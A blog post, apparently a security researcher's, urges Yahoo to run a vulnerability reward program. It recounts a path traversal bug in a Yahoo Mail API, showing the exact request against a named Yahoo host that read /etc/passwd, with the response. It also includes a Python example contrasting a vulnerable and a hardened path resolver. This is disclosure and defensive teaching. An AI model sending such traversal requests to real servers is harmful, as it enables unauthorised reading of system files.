Yahoo, please start with a Vulnerability Reward Program
Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking
— Reuters Tech (@ReutersTech) May 17, 2013
This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, PayPal, Etsy, etc. (see the list of reward programs at @bugcrowd).
Last year I discovered an LFI/Path Traversal vulnerability in a REST API used by Yahoo Mail, and I got an automated mail from their mailer. I refused to report more bugs to them because it's boring to talk to bots.
```http
GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1
Host: prod1.rest-notify.msg.yahoo.com

HTTP/1.1 200 OK
Connection: close
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 29676

root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
```
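The request above only works because the handler used the client-supplied path without canonicalising it and checking that the result still lies under its document root. As an added example (not code from this post or from Yahoo's service), here is a minimal Python model of such a resolver beside a hardened one; the document root `/srv/xframe`, the route prefix `/v2/xframe/`, the function names and the sample request targets are assumptions made for illustration. The hardened version also strips the query string and percent-decodes exactly once, so an encoded `%2e%2e` is seen as `..` before the containment check runs.

```python
"""Path traversal in a route handler: naive join vs. canonicalised check.

Added example, not code from the original post or from the Yahoo service it
describes. DOCROOT, ROUTE, the function names and the sample targets are
assumptions made for illustration.
"""
import posixpath
from urllib.parse import unquote

DOCROOT = "/srv/xframe"   # assumed document root of the handler
ROUTE = "/v2/xframe/"     # assumed route prefix the handler strips


def request_rest(target: str):
    """Return the part of the request target after ROUTE, or None.

    Drops the query string ('?bc' in the post's request) and percent-decodes
    exactly once, so '%2e%2e' is seen as '..' before any path check runs.
    """
    path, _, _query = target.partition("?")
    path = unquote(path)
    if not path.startswith(ROUTE):
        return None
    return path[len(ROUTE):]


def naive_resolve(docroot: str, rest: str) -> str:
    """Vulnerable: concatenate and let the '..' segments collapse.

    normpath stands in for what the OS does when the path is opened: with
    enough '..' segments the result lies outside docroot entirely.
    """
    return posixpath.normpath(docroot + "/" + rest)


def safe_resolve(docroot: str, rest: str):
    """Hardened: canonicalise first, then require the result to stay in docroot.

    Returns the resolved path, or None if the request escapes docroot.
    posixpath keeps this deterministic and offline; against a real filesystem
    use os.path.realpath() so a symlink cannot point back out of docroot.
    """
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, rest.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def handle(target: str):
    """Simulated handler: (status, resolved path) for a request target."""
    rest = request_rest(target)
    if rest is None:
        return 404, None
    resolved = safe_resolve(DOCROOT, rest)
    if resolved is None:
        return 403, None
    return 200, resolved


if __name__ == "__main__":
    # The request from the post: the traversal escapes the document root
    # under the naive resolver and is refused by the hardened one.
    traversal = "/v2/xframe/../../../../../../../etc/passwd?bc"
    rest = request_rest(traversal)
    print("naive :", naive_resolve(DOCROOT, rest))
    print("safe  :", handle(traversal))
    print("legit :", handle("/v2/xframe/frame.html?bc"))
```

The containment test compares canonical strings, so a prefix like `/srv/xframe2` cannot slip past it, and the single `unquote` means a double-encoded `%252e` stays a literal filename component rather than being decoded into `..` later. In a real service the same check belongs at the one place that maps request paths to files, not scattered across routes.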
Some minutes later I got an automated reply from Yahoo Security Contact (security at yahoo-inc.com):
Nils,
Thank you for contacting Yahoo!. These issues have been passed
along to the correct teams to investigate. Should a fix be required,
we will again contact you and ask that you see the issues as resolved.
Thanks again,
Yahoo! Security Contact
Days later the issue was fixed. But no more replies from them!
Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.